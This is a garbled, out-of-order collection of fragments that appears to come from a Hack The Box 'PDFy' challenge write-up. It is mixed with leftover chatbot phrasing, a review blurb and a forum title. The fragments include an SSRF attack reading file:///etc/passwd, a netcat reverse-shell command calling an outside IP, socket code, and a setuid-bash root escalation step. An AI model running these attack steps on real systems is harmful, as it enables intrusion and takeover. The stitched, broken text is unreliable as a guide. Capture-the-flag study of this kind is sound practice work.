The next step is to enumerate the services running on these ports to gather more information about the system.
If the backend server does not strictly validate or restrict the URLs it receives, an attacker can input internal IP addresses (like 127.0.0.1 or localhost ) or private cloud metadata endpoints to access restricted resources. Testing Simple SSRF Payloads
I hope this draft helps! Let me know if you want to add or modify anything.
[Attacker] ---> Post URL (Exploit Server) ---> [PDFy Web Server] | Follows 302 Redirect v [Attacker Flag] <--- Generates PDF <--- Reads file:///etc/passwd 🔍 Step 1: Initial Reconnaissance & Code Review pdfy htb writeup upd
After restarting the pdfy-converter service, we verify that the /bin/bash shell has been modified to have setuid permissions. We then execute the /bin/bash shell to gain root access.
This writeup was updated to reflect changes made to the PDFY machine on Hack The Box. The machine was re-released with additional challenges and vulnerabilities, which were addressed in this updated writeup. Users are encouraged to revisit the machine and attempt to exploit it using the techniques described in this writeup.
# Establish a reverse shell os.system('nc 10.10.14.12 4444 -e /bin/bash') The next step is to enumerate the services
The is a top-tier walkthrough that balances hand-holding with deep technical insight. It’s clear the author took time to verify every step, update outdated commands, and explain the underlying vulnerabilities in a way that sticks with you.
Official PDFy Discussion - Page 3 - Challenges - Hack The Box :: Forums
The PDFY challenge serves as a valuable learning experience for cybersecurity enthusiasts, highlighting the importance of thorough vulnerability assessment, creative exploitation, and strategic privilege escalation. Let me know if you want to add or modify anything
Create an exploit.php script on your public-facing web server with the following code:
# Create a socket object s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
(ALL) NOPASSWD: /usr/bin/pdftex
The box typically starts with a standard web server running a simple web application. The core functionality allows a user to input a URL or upload a file to generate a PDF.